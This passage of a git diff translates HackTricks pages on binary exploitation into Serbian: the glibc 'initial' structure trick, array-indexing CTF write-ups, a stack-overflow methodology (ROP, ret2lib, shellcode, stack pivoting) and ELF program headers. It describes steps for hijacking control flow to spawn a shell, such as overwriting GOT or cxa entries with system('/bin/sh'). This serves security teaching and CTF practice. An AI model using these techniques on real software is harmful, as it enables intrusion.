vrednosti `f->flavor` biće pozvane različite funkcije.\ +U zavisnosti od vrednosti, adresa funkcije koja će biti pozvana biće na drugom mestu, ali će uvek biti **demangled**. -The variable `f` points to the **`initial`** structure and depending on the value of `f->flavor` different functions will be called.\ -Depending on the value, the address of the function to call will be in a different place, but it'll always be **demangled**. +Pored toga, u opcijama **`ef_on`** i **`ef_cxa`** takođe je moguće kontrolisati **argument**. -Moreover, in the options **`ef_on`** and **`ef_cxa`** it's also possible to control an **argument**. 
+Moguće je proveriti **`initial` strukturu** u sesiji debagovanja sa GEF pokrenutim **`gef> p initial`**. -It's possible to check the **`initial` structure** in a debugging session with GEF running **`gef> p initial`**. - -To abuse this you need either to **leak or erase the `PTR_MANGLE`cookie** and then overwrite a `cxa` entry in initial with `system('/bin/sh')`.\ -You can find an example of this in the [**original blog post about the technique**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#6---code-execution-via-other-mangled-pointers-in-initial-structure). +Da bi se ovo iskoristilo, potrebno je ili **leak** ili obrisati `PTR_MANGLE` kolačić i zatim prepisati `cxa` unos u initial sa `system('/bin/sh')`.\ +Možete pronaći primer ovoga u [**originalnom blog postu o tehnici**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#6---code-execution-via-other-mangled-pointers-in-initial-structure). {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/array-indexing.md b/src/binary-exploitation/array-indexing.md index 675eb939e..188d35e12 100644 --- a/src/binary-exploitation/array-indexing.md +++ b/src/binary-exploitation/array-indexing.md 
@@ -1,18 +1,18 @@ -# Array Indexing +# Indeksiranje Niza {{#include ../banners/hacktricks-training.md}} -## Basic Information +## Osnovne Informacije -This category includes all vulnerabilities that occur because it is possible to overwrite certain data through errors in the handling of indexes in arrays. It's a very wide category with no specific methodology as the exploitation mechanism relays completely on the conditions of the vulnerability. +Ova kategorija obuhvata sve ranjivosti koje se javljaju zbog mogućnosti prepisivanja određenih podataka kroz greške u rukovanju indeksima u nizovima. To je veoma široka kategorija bez specifične metodologije, jer mehanizam eksploatacije potpuno zavisi od uslova ranjivosti. -However he you can find some nice **examples**: +Međutim, ovde možete pronaći neke lepe **primere**: - [https://guyinatuxedo.github.io/11-index/swampctf19_dreamheaps/index.html](https://guyinatuxedo.github.io/11-index/swampctf19_dreamheaps/index.html) - - There are **2 colliding arrays**, one for **addresses** where data is stored and one with the **sizes** of that data. It's possible to overwrite one from the other, enabling to write an arbitrary address indicating it as a size. This allows to write the address of the `free` function in the GOT table and then overwrite it with the address to `system`, and call free from a memory with `/bin/sh`. +- Postoje **2 kolidirajuća niza**, jedan za **adrese** gde su podaci sačuvani i jedan sa **veličinama** tih podataka. Moguće je prepisati jedan iz drugog, omogućavajući pisanje proizvoljne adrese označavajući je kao veličinu. Ovo omogućava pisanje adrese `free` funkcije u GOT tabeli, a zatim je prepisivanje adresom `system`, i pozivanje free iz memorije sa `/bin/sh`. - [https://guyinatuxedo.github.io/11-index/csaw18_doubletrouble/index.html](https://guyinatuxedo.github.io/11-index/csaw18_doubletrouble/index.html) - - 64 bits, no nx. 
Overwrite a size to get a kind of buffer overflow where every thing is going to be used a double number and sorted from smallest to biggest so it's needed to create a shellcode that fulfil that requirement, taking into account that the canary shouldn't be moved from it's position and finally overwriting the RIP with an address to ret, that fulfil he previous requirements and putting the biggest address a new address pointing to the start of the stack (leaked by the program) so it's possible to use the ret to jump there. +- 64 bita, bez nx. Prepisivanje veličine da bi se dobio neki oblik buffer overflow-a gde će sve biti korišćeno kao dupli broj i sortirano od najmanjeg do najvećeg, tako da je potrebno kreirati shellcode koji ispunjava taj zahtev, uzimajući u obzir da se kanar ne sme pomerati sa svoje pozicije i konačno prepisivanje RIP-a sa adresom za ret, koja ispunjava prethodne zahteve i postavljanje najveće adrese na novu adresu koja pokazuje na početak steka (procurila od programa) tako da je moguće koristiti ret da se skoči tamo. - [https://faraz.faith/2019-10-20-secconctf-2019-sum/](https://faraz.faith/2019-10-20-secconctf-2019-sum/) - - 64bits, no relro, canary, nx, no pie. There is an off-by-one in an array in the stack that allows to control a pointer granting WWW (it write the sum of all the numbers of the array in the overwritten address by the of-by-one in the array). The stack is controlled so the GOT `exit` address is overwritten with `pop rdi; ret`, and in the stack is added the address to `main` (looping back to `main`). The a ROP chain to leak the address of put in the GOT using puts is used (`exit` will be called so it will call `pop rdi; ret` therefore executing this chain in the stack). Finally a new ROP chain executing ret2lib is used. +- 64 bita, bez relro, kanar, nx, bez pie. Postoji off-by-one u nizu na steku koji omogućava kontrolu pokazivača dodeljujući WWW (upisuje sumu svih brojeva niza u prepisanu adresu zbog off-by-one u nizu). 
Stek je kontrolisan tako da je GOT `exit` adresa prepisana sa `pop rdi; ret`, a na stek je dodata adresa za `main` (ponovno se vraća na `main`). Koristi se ROP lanac za procurivanje adrese stavljene u GOT koristeći puts (`exit` će biti pozvan tako da će pozvati `pop rdi; ret`, stoga izvršavajući ovaj lanac na steku). Na kraju se koristi novi ROP lanac koji izvršava ret2lib. - [https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html](https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html) - - 32 bit, no relro, no canary, nx, pie. Abuse a bad indexing to leak addresses of libc and heap from the stack. Abuse the buffer overflow o do a ret2lib calling `system('/bin/sh')` (the heap address is needed to bypass a check). +- 32 bita, bez relro, bez kanara, nx, pie. Iskoristite loše indeksiranje da procurite adrese libc i heap-a iz steka. Iskoristite buffer overflow da uradite ret2lib pozivajući `system('/bin/sh')` (adresa heap-a je potrebna da bi se zaobišla provera). diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md index a5e59ae40..b44157cc5 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/README.md 
@@ -1,111 +1,111 @@ -# Basic Binary Exploitation Methodology +# Osnovna Metodologija Eksploatacije Binarnih Datoteka {{#include ../../banners/hacktricks-training.md}} -## ELF Basic Info +## Osnovne Informacije o ELF-u -Before start exploiting anything it's interesting to understand part of the structure of an **ELF binary**: +Pre nego što počnete sa eksploatacijom bilo čega, zanimljivo je razumeti deo strukture **ELF binarne datoteke**: {{#ref}} elf-tricks.md {{#endref}} -## Exploiting Tools +## Alati za Eksploataciju {{#ref}} tools/ {{#endref}} -## Stack Overflow Methodology +## Metodologija Stack Overflow-a -With so many techniques it's good to have a scheme when each technique will be useful. Note that the same protections will affect different techniques. You can find ways to bypass the protections on each protection section but not in this methodology. +Sa toliko tehnika, dobro je imati shemu kada će svaka tehnika biti korisna. Imajte na umu da će iste zaštite uticati na različite tehnike. Možete pronaći načine da zaobiđete zaštite u svakoj sekciji zaštite, ali ne u ovoj metodologiji. -## Controlling the Flow +## Kontrola Tokova -There are different was you could end controlling the flow of a program: +Postoje različiti načini na koje možete kontrolisati tok programa: -- [**Stack Overflows**](../stack-overflow/) overwriting the return pointer from the stack or the EBP -> ESP -> EIP. - - Might need to abuse an [**Integer Overflows**](../integer-overflow.md) to cause the overflow -- Or via **Arbitrary Writes + Write What Where to Execution** - - [**Format strings**](../format-strings/)**:** Abuse `printf` to write arbitrary content in arbitrary addresses. - - [**Array Indexing**](../array-indexing.md): Abuse a poorly designed indexing to be able to control some arrays and get an arbitrary write. 
- - Might need to abuse an [**Integer Overflows**](../integer-overflow.md) to cause the overflow - - **bof to WWW via ROP**: Abuse a buffer overflow to construct a ROP and be able to get a WWW. +- [**Stack Overflows**](../stack-overflow/) prepisivanjem povratne adrese iz steka ili EBP -> ESP -> EIP. +- Možda će biti potrebno da zloupotrebite [**Integer Overflows**](../integer-overflow.md) da izazovete prelivanje +- Ili putem **Arbitrary Writes + Write What Where to Execution** +- [**Format strings**](../format-strings/)**:** Zloupotreba `printf` za pisanje proizvoljnog sadržaja na proizvoljne adrese. +- [**Array Indexing**](../array-indexing.md): Zloupotreba loše dizajniranog indeksiranja kako biste mogli kontrolisati neke nizove i dobiti proizvoljno pisanje. +- Možda će biti potrebno da zloupotrebite [**Integer Overflows**](../integer-overflow.md) da izazovete prelivanje +- **bof to WWW via ROP**: Zloupotreba prelivanja bafera za konstrukciju ROP-a i mogućnost dobijanja WWW. -You can find the **Write What Where to Execution** techniques in: +Možete pronaći tehnike **Write What Where to Execution** u: {{#ref}} ../arbitrary-write-2-exec/ {{#endref}} -## Eternal Loops +## Večne Petlje -Something to take into account is that usually **just one exploitation of a vulnerability might not be enough** to execute a successful exploit, specially some protections need to be bypassed. Therefore, it's interesting discuss some options to **make a single vulnerability exploitable several times** in the same execution of the binary: +Nešto što treba uzeti u obzir je da obično **samo jedna eksploatacija ranjivosti možda neće biti dovoljna** za izvršenje uspešne eksploatacije, posebno neke zaštite treba zaobići. 
Stoga, zanimljivo je raspraviti o nekim opcijama za **učiniti jednu ranjivost eksploatabilnom više puta** u istoj izvršnoj instanci binarne datoteke: -- Write in a **ROP** chain the address of the **`main` function** or to the address where the **vulnerability** is occurring. - - Controlling a proper ROP chain you might be able to perform all the actions in that chain -- Write in the **`exit` address in GOT** (or any other function used by the binary before ending) the address to go **back to the vulnerability** -- As explained in [**.fini_array**](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md#eternal-loop)**,** store 2 functions here, one to call the vuln again and another to call**`__libc_csu_fini`** which will call again the function from `.fini_array`. +- Pisanje u **ROP** lancu adrese **`main` funkcije** ili na adresu gde se **ranjivost** dešava. +- Kontrolisanjem odgovarajućeg ROP lanca možda ćete moći da izvršite sve akcije u tom lancu +- Pisanje u **`exit` adresu u GOT** (ili bilo kojoj drugoj funkciji koju koristi binarna datoteka pre završetka) adrese za **povratak na ranjivost** +- Kao što je objašnjeno u [**.fini_array**](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md#eternal-loop)**,** ovde čuvajte 2 funkcije, jednu za ponovno pozivanje ranjivosti i drugu za pozivanje **`__libc_csu_fini`** koja će ponovo pozvati funkciju iz `.fini_array`. -## Exploitation Goals +## Ciljevi Eksploatacije -### Goal: Call an Existing function +### Cilj: Pozvati Postojeću funkciju -- [**ret2win**](./#ret2win): There is a function in the code you need to call (maybe with some specific params) in order to get the flag. - - In a **regular bof without** [**PIE**](../common-binary-protections-and-bypasses/pie/) **and** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/) you just need to write the address in the return address stored in the stack. 
- - In a bof with [**PIE**](../common-binary-protections-and-bypasses/pie/), you will need to bypass it - - In a bof with [**canary**](../common-binary-protections-and-bypasses/stack-canaries/), you will need to bypass it - - If you need to set several parameter to correctly call the **ret2win** function you can use: - - A [**ROP**](./#rop-and-ret2...-techniques) **chain if there are enough gadgets** to prepare all the params - - [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) (in case you can call this syscall) to control a lot of registers - - Gadgets from [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) and [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) to control several registers - - Via a [**Write What Where**](../arbitrary-write-2-exec/) you could abuse other vulns (not bof) to call the **`win`** function. -- [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): In case the stack contains pointers to a function that is going to be called or to a string that is going to be used by an interesting function (system or printf), it's possible to overwrite that address. - - [**ASLR**](../common-binary-protections-and-bypasses/aslr/) or [**PIE**](../common-binary-protections-and-bypasses/pie/) might affect the addresses. -- [**Uninitialized vatiables**](../stack-overflow/uninitialized-variables.md): You never know. +- [**ret2win**](./#ret2win): Postoji funkcija u kodu koju treba pozvati (možda sa nekim specifičnim parametrima) kako biste dobili zastavicu. +- U **običnom bof-u bez** [**PIE**](../common-binary-protections-and-bypasses/pie/) **i** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/) samo treba da upišete adresu u povratnu adresu smeštenu u steku. 
+- U bof-u sa [**PIE**](../common-binary-protections-and-bypasses/pie/), moraćete da je zaobiđete +- U bof-u sa [**canary**](../common-binary-protections-and-bypasses/stack-canaries/), moraćete da je zaobiđete +- Ako treba da postavite nekoliko parametara da biste ispravno pozvali funkciju **ret2win**, možete koristiti: +- [**ROP**](./#rop-and-ret2...-techniques) **lanac ako ima dovoljno gadgeta** da pripremite sve parametre +- [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) (u slučaju da možete pozvati ovaj syscall) da kontrolišete mnogo registara +- Gadgeti iz [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) i [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) za kontrolu više registara +- Putem [**Write What Where**](../arbitrary-write-2-exec/) mogli biste zloupotrebiti druge ranjivosti (ne bof) da pozovete funkciju **`win`**. +- [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): U slučaju da stek sadrži pokazivače na funkciju koja će biti pozvana ili na string koji će koristiti zanimljiva funkcija (system ili printf), moguće je prepisati tu adresu. +- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) ili [**PIE**](../common-binary-protections-and-bypasses/pie/) mogu uticati na adrese. +- [**Neinicijalizovane promenljive**](../stack-overflow/uninitialized-variables.md): Nikad ne znate. 
-### Goal: RCE +### Cilj: RCE -#### Via shellcode, if nx disabled or mixing shellcode with ROP: +#### Putem shellcode-a, ako je nx onemogućen ili mešanjem shellcode-a sa ROP-om: -- [**(Stack) Shellcode**](./#stack-shellcode): This is useful to store a shellcode in the stack before of after overwriting the return pointer and then **jump to it** to execute it: - - **In any case, if there is a** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/)**,** in a regular bof you will need to bypass (leak) it - - **Without** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **and** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md) it's possible to jump to the address of the stack as it won't never change - - **With** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) you will need techniques such as [**ret2esp/ret2reg**](../rop-return-oriented-programing/ret2esp-ret2reg.md) to jump to it - - **With** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md), you will need to use some [**ROP**](../rop-return-oriented-programing/) **to call `memprotect`** and make some page `rwx`, in order to then **store the shellcode in there** (calling read for example) and then jump there. - - This will mix shellcode with a ROP chain. 
+- [**(Stack) Shellcode**](./#stack-shellcode): Ovo je korisno za skladištenje shellcode-a u steku pre ili posle prepisivanja povratne adrese i zatim **skakanja na njega** da ga izvršite: +- **U svakom slučaju, ako postoji** [**canary**](../common-binary-protections-and-bypasses/stack-canaries/)**,** u običnom bof-u moraćete da je zaobiđete (leak) +- **Bez** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **i** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md) moguće je skočiti na adresu steka jer se nikada neće promeniti +- **Sa** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) moraćete koristiti tehnike kao što su [**ret2esp/ret2reg**](../rop-return-oriented-programing/ret2esp-ret2reg.md) da biste skočili na njega +- **Sa** [**nx**](../common-binary-protections-and-bypasses/no-exec-nx.md), moraćete da koristite neki [**ROP**](../rop-return-oriented-programing/) **da pozovete `memprotect`** i učinite neku stranicu `rwx`, kako biste zatim **smestili shellcode tamo** (pozivajući read na primer) i zatim skočili tamo. +- Ovo će pomešati shellcode sa ROP lancem. -#### Via syscalls +#### Putem syscalls -- [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/): Useful to call `execve` to run arbitrary commands. You need to be able to find the **gadgets to call the specific syscall with the parameters**. - - If [**ASLR**](../common-binary-protections-and-bypasses/aslr/) or [**PIE**](../common-binary-protections-and-bypasses/pie/) are enabled you'll need to defeat them **in order to use ROP gadgets** from the binary or libraries. 
- - [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) can be useful to prepare the **ret2execve** - - Gadgets from [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) and [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) to control several registers +- [**Ret2syscall**](../rop-return-oriented-programing/rop-syscall-execv/): Korisno za pozivanje `execve` da izvrši proizvoljne komande. Morate biti u mogućnosti da pronađete **gadgete za pozivanje specifičnog syscall-a sa parametrima**. +- Ako su [**ASLR**](../common-binary-protections-and-bypasses/aslr/) ili [**PIE**](../common-binary-protections-and-bypasses/pie/) omogućeni, moraćete da ih savladate **da biste koristili ROP gadgete** iz binarne datoteke ili biblioteka. +- [**SROP**](../rop-return-oriented-programing/srop-sigreturn-oriented-programming/) može biti koristan za pripremu **ret2execve** +- Gadgeti iz [**ret2csu**](../rop-return-oriented-programing/ret2csu.md) i [**ret2vdso**](../rop-return-oriented-programing/ret2vdso.md) za kontrolu više registara -#### Via libc +#### Putem libc -- [**Ret2lib**](../rop-return-oriented-programing/ret2lib/): Useful to call a function from a library (usually from **`libc`**) like **`system`** with some prepared arguments (e.g. `'/bin/sh'`). You need the binary to **load the library** with the function you would like to call (libc usually). - - If **statically compiled and no** [**PIE**](../common-binary-protections-and-bypasses/pie/), the **address** of `system` and `/bin/sh` are not going to change, so it's possible to use them statically. - - **Without** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **and knowing the libc version** loaded, the **address** of `system` and `/bin/sh` are not going to change, so it's possible to use them statically. 
- - With [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **but no** [**PIE**](../common-binary-protections-and-bypasses/pie/)**, knowing the libc and with the binary using the `system`** function it's possible to **`ret` to the address of system in the GOT** with the address of `'/bin/sh'` in the param (you will need to figure this out). - - With [ASLR](../common-binary-protections-and-bypasses/aslr/) but no [PIE](../common-binary-protections-and-bypasses/pie/), knowing the libc and **without the binary using the `system`** : - - Use [**`ret2dlresolve`**](../rop-return-oriented-programing/ret2dlresolve.md) to resolve the address of `system` and call it - - **Bypass** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) and calculate the address of `system` and `'/bin/sh'` in memory. - - **With** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **and** [**PIE**](../common-binary-protections-and-bypasses/pie/) **and not knowing the libc**: You need to: - - Bypass [**PIE**](../common-binary-protections-and-bypasses/pie/) - - Find the **`libc` version** used (leak a couple of function addresses) - - Check the **previous scenarios with ASLR** to continue. +- [**Ret2lib**](../rop-return-oriented-programing/ret2lib/): Korisno za pozivanje funkcije iz biblioteke (obično iz **`libc`**) kao što je **`system`** sa nekim pripremljenim argumentima (npr. `'/bin/sh'`). Potrebno je da binarna datoteka **učita biblioteku** sa funkcijom koju želite da pozovete (libc obično). +- Ako je **staticki kompajlirana i bez** [**PIE**](../common-binary-protections-and-bypasses/pie/), **adresa** `system` i `/bin/sh` se neće menjati, tako da ih je moguće koristiti statički. +- **Bez** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **i znajući verziju libc** koja je učitana, **adresa** `system` i `/bin/sh` se neće menjati, tako da ih je moguće koristiti statički. 
+- Sa [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **ali bez** [**PIE**](../common-binary-protections-and-bypasses/pie/)**, znajući libc i sa binarnom datotekom koja koristi funkciju `system`** moguće je **`ret` na adresu system u GOT** sa adresom `'/bin/sh'` u parametru (to ćete morati da otkrijete). +- Sa [ASLR](../common-binary-protections-and-bypasses/aslr/) ali bez [PIE](../common-binary-protections-and-bypasses/pie/), znajući libc i **bez binarne datoteke koja koristi `system`** : +- Koristite [**`ret2dlresolve`**](../rop-return-oriented-programing/ret2dlresolve.md) da rešite adresu `system` i pozovete je +- **Zaobiđite** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) i izračunajte adresu `system` i `'/bin/sh'` u memoriji. +- **Sa** [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **i** [**PIE**](../common-binary-protections-and-bypasses/pie/) **i ne znajući libc**: Morate: +- Zaobići [**PIE**](../common-binary-protections-and-bypasses/pie/) +- Pronaći **`libc` verziju** koja se koristi (leak nekoliko adresa funkcija) +- Proveriti **prethodne scenarije sa ASLR** da nastavite. -#### Via EBP/RBP +#### Putem EBP/RBP -- [**Stack Pivoting / EBP2Ret / EBP Chaining**](../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md): Control the ESP to control RET through the stored EBP in the stack. - - Useful for **off-by-one** stack overflows - - Useful as an alternate way to end controlling EIP while abusing EIP to construct the payload in memory and then jumping to it via EBP +- [**Stack Pivoting / EBP2Ret / EBP Chaining**](../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md): Kontrola ESP-a da kontrolišete RET putem smeštenog EBP-a u steku. 
+- Korisno za **off-by-one** stack overflows +- Korisno kao alternativni način da završite kontrolu EIP-a dok zloupotrebljavate EIP za konstrukciju payload-a u memoriji i zatim skakanje na njega putem EBP-a -#### Misc +#### Razno -- [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): In case the stack contains pointers to a function that is going to be called or to a string that is going to be used by an interesting function (system or printf), it's possible to overwrite that address. - - [**ASLR**](../common-binary-protections-and-bypasses/aslr/) or [**PIE**](../common-binary-protections-and-bypasses/pie/) might affect the addresses. -- [**Uninitialized variables**](../stack-overflow/uninitialized-variables.md): You never know +- [**Pointers Redirecting**](../stack-overflow/pointer-redirecting.md): U slučaju da stek sadrži pokazivače na funkciju koja će biti pozvana ili na string koji će koristiti zanimljiva funkcija (system ili printf), moguće je prepisati tu adresu. +- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) ili [**PIE**](../common-binary-protections-and-bypasses/pie/) mogu uticati na adrese. +- [**Neinicijalizovane promenljive**](../stack-overflow/uninitialized-variables.md): Nikad ne znate {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md index f5886ddcc..f4edb44d9 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.md @@ -1,11 +1,10 @@ -# ELF Basic Information +# ELF Osnovne Informacije {{#include ../../banners/hacktricks-training.md}} ## Program Headers -The describe to the loader how to load the **ELF** into memory: - +Oni opisuju loader-u kako da učita **ELF** u memoriju: ```bash readelf -lW lnstat 
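Review bot: the `@@ -1,11 +1,10 @@` hunk of `elf-tricks.md` drops the blank line that separated the intro sentence from the ```` ```bash ```` fence (the lone removed `-` line after `-The describe to the loader...`), which is what turns the hunk from 11 lines into 10. The fence still renders, but every other page in this tree keeps an empty line before a code fence, so `+Oni opisuju loader-u kako da učita **ELF** u memoriju:` should be followed by a blank line before ```` ```bash ```` rather than butting straight against it.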
@@ -14,80 +13,78 @@ Entry point 0x1c00 There are 9 program headers, starting at offset 64 Program Headers: - Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align - PHDR 0x000040 0x0000000000000040 0x0000000000000040 0x0001f8 0x0001f8 R 0x8 - INTERP 0x000238 0x0000000000000238 0x0000000000000238 0x00001b 0x00001b R 0x1 - [Requesting program interpreter: /lib/ld-linux-aarch64.so.1] - LOAD 0x000000 0x0000000000000000 0x0000000000000000 0x003f7c 0x003f7c R E 0x10000 - LOAD 0x00fc48 0x000000000001fc48 0x000000000001fc48 0x000528 0x001190 RW 0x10000 - DYNAMIC 0x00fc58 0x000000000001fc58 0x000000000001fc58 0x000200 0x000200 RW 0x8 - NOTE 0x000254 0x0000000000000254 0x0000000000000254 0x0000e0 0x0000e0 R 0x4 - GNU_EH_FRAME 0x003610 0x0000000000003610 0x0000000000003610 0x0001b4 0x0001b4 R 0x4 - GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x10 - GNU_RELRO 0x00fc48 0x000000000001fc48 0x000000000001fc48 0x0003b8 0x0003b8 R 0x1 +Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align +PHDR 0x000040 0x0000000000000040 0x0000000000000040 0x0001f8 0x0001f8 R 0x8 +INTERP 0x000238 0x0000000000000238 0x0000000000000238 0x00001b 0x00001b R 0x1 +[Requesting program interpreter: /lib/ld-linux-aarch64.so.1] +LOAD 0x000000 0x0000000000000000 0x0000000000000000 0x003f7c 0x003f7c R E 0x10000 +LOAD 0x00fc48 0x000000000001fc48 0x000000000001fc48 0x000528 0x001190 RW 0x10000 +DYNAMIC 0x00fc58 0x000000000001fc58 0x000000000001fc58 0x000200 0x000200 RW 0x8 +NOTE 0x000254 0x0000000000000254 0x0000000000000254 0x0000e0 0x0000e0 R 0x4 +GNU_EH_FRAME 0x003610 0x0000000000003610 0x0000000000003610 0x0001b4 0x0001b4 R 0x4 +GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x10 +GNU_RELRO 0x00fc48 0x000000000001fc48 0x000000000001fc48 0x0003b8 0x0003b8 R 0x1 - Section to Segment mapping: - Segment Sections... 
- 00 - 01 .interp - 02 .interp .note.gnu.build-id .note.ABI-tag .note.package .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame - 03 .init_array .fini_array .dynamic .got .data .bss - 04 .dynamic - 05 .note.gnu.build-id .note.ABI-tag .note.package - 06 .eh_frame_hdr - 07 - 08 .init_array .fini_array .dynamic .got +Section to Segment mapping: +Segment Sections... +00 +01 .interp +02 .interp .note.gnu.build-id .note.ABI-tag .note.package .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame +03 .init_array .fini_array .dynamic .got .data .bss +04 .dynamic +05 .note.gnu.build-id .note.ABI-tag .note.package +06 .eh_frame_hdr +07 +08 .init_array .fini_array .dynamic .got ``` - -The previous program has **9 program headers**, then, the **segment mapping** indicates in which program header (from 00 to 08) **each section is located**. +Prethodni program ima **9 zaglavlja programa**, zatim, **mapiranje segmenata** ukazuje u kojem zaglavlju programa (od 00 do 08) **se nalazi svaka sekcija**. ### PHDR - Program HeaDeR -Contains the program header tables and metadata itself. +Sadrži tabele zaglavlja programa i samu metapodatke. ### INTERP -Indicates the path of the loader to use to load the binary into memory. +Ukazuje putanju učitavača koji treba koristiti za učitavanje binarnog fajla u memoriju. ### LOAD -These headers are used to indicate **how to load a binary into memory.**\ -Each **LOAD** header indicates a region of **memory** (size, permissions and alignment) and indicates the bytes of the ELF **binary to copy in there**. +Ova zaglavlja se koriste za označavanje **kako učitati binarni fajl u memoriju.**\ +Svako **LOAD** zaglavlje označava region **memorije** (veličina, dozvole i poravnanje) i ukazuje na bajtove ELF **binarne datoteke koje treba kopirati tamo**. 
-For example, the second one has a size of 0x1190, should be located at 0x1fc48 with permissions read and write and will be filled with 0x528 from the offset 0xfc48 (it doesn't fill all the reserved space). This memory will contain the sections `.init_array .fini_array .dynamic .got .data .bss`. +Na primer, drugo ima veličinu od 0x1190, treba da bude locirano na 0x1fc48 sa dozvolama za čitanje i pisanje i biće popunjeno sa 0x528 sa ofseta 0xfc48 (ne popunjava sav rezervisani prostor). Ova memorija će sadržati sekcije `.init_array .fini_array .dynamic .got .data .bss`. ### DYNAMIC -This header helps to link programs to their library dependencies and apply relocations. Check the **`.dynamic`** section. +Ovo zaglavlje pomaže u povezivanju programa sa njihovim zavisnostima biblioteka i primeni relokacija. Proverite sekciju **`.dynamic`**. ### NOTE -This stores vendor metadata information about the binary. +Ovo čuva informacije o metapodacima dobavljača o binarnom fajlu. ### GNU_EH_FRAME -Defines the location of the stack unwind tables, used by debuggers and C++ exception handling-runtime functions. +Definiše lokaciju tabela za odmotavanje steka, koje koriste debageri i C++ funkcije za rukovanje izuzecima. ### GNU_STACK -Contains the configuration of the stack execution prevention defense. If enabled, the binary won't be able to execute code from the stack. +Sadrži konfiguraciju zaštite od izvršavanja na steku. Ako je omogućeno, binarni fajl neće moći da izvršava kod sa steka. ### GNU_RELRO -Indicates the RELRO (Relocation Read-Only) configuration of the binary. This protection will mark as read-only certain sections of the memory (like the `GOT` or the `init` and `fini` tables) after the program has loaded and before it begins running. +Ukazuje na RELRO (Relocation Read-Only) konfiguraciju binarnog fajla. 
Ova zaštita će označiti kao samo za čitanje određene sekcije memorije (kao što su `GOT` ili `init` i `fini` tabele) nakon što se program učita i pre nego što počne da se izvršava. -In the previous example it's copying 0x3b8 bytes to 0x1fc48 as read-only affecting the sections `.init_array .fini_array .dynamic .got .data .bss`. +U prethodnom primeru kopira 0x3b8 bajtova na 0x1fc48 kao samo za čitanje, utičući na sekcije `.init_array .fini_array .dynamic .got .data .bss`. -Note that RELRO can be partial or full, the partial version do not protect the section **`.plt.got`**, which is used for **lazy binding** and needs this memory space to have **write permissions** to write the address of the libraries the first time their location is searched. +Napomena da RELRO može biti delimičan ili potpun, delimična verzija ne štiti sekciju **`.plt.got`**, koja se koristi za **lenjo povezivanje** i treba ovaj prostor u memoriji da ima **dozvole za pisanje** da bi zapisala adresu biblioteka kada se prvi put traži njihova lokacija. ### TLS -Defines a table of TLS entries, which stores info about thread-local variables. +Definiše tabelu TLS unosa, koja čuva informacije o lokalnim promenljivama niti. -## Section Headers - -Section headers gives a more detailed view of the ELF binary +## Zaglavlja sekcija +Zaglavlja sekcija daju detaljniji pregled ELF binarnog fajla. ``` objdump lnstat -h 
